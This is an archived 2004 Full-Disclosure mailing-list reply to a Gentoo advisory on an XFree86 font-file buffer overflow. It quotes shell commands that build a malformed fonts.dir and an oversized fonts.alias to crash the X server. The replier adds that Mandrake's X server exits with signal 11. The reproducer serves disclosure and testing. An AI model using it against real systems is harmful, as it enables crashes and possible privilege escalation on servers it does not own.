hacking security forum

[Full-Disclosure] Re: [ GLSA 200402-02 ] XFree86 Font Information File Buffer Overflow

From: Evert Daman <linux@digipix.org>
Date: Thu Feb 12 2004 - 02:45:51 EST

> To reproduce the overflow on the command line, you can run:
>
> # cat > fonts.dir <<EOF
> ~ 1
> ~ word.bdf \
> ~ -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
> ~ EOF
> # perl -e 'print "0" x 1024 . "A" x 96 . "\n"' > fonts.alias
> # X :0 -fp $PWD
>
> {Some output removed}... Server aborting... Segmentation fault (core
dumped)

mandrake gives me a:

Fatal server error:
Caught signal 11. Server aborting

no segfault or something...

kind regards,
Evert

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Thu Feb 12 03:41:07 2004

This archive was generated by hypermail 2.1.8 : Thu Feb 12 2004 - 04:01:02 EST

Custom Search